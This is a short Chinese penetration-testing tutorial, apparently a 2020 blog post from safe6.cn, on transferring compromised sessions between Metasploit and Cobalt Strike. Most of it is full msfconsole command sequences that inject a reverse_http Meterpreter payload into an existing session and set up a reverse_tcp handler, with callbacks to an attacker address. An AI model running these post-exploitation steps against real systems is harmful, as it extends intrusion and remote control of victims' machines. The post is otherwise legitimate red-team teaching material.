前言
一般大家都是两款神器结合使用,自然少不了shell之间转换。
msf转cs
首先cs创建一个windows/becon_http/reverse_http的 Listener
再用msf弹shell过去
msf exploit(handler) > use exploit/windows/local/payload_inject msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http msf exploit(payload_inject) > set DisablePayloadHandler true msf exploit(payload_inject) > set LHOST 192.168.0.143 msf exploit(payload_inject) > set LPORT 4444 msf exploit(payload_inject) > set SESSION 1 (用session命令可以查看对应id) msf exploit(payload_inject) > exploit
cs转msf
先用msf监听
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.0.143 msf exploit(handler) > set lport 4444 msf exploit(handler) > exploit
再用cs反弹
创建一个windows/foreign/reverse_tcp的 Listener
然后选中对应机器,右键->Spawn,选择刚刚创建的监听器。
ps:注意两边用的payload要一致
来源:http://www.safe6.cn/
本文由 safe6 创作,著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。
本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!! 最后编辑时间为: 2020-07-20
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论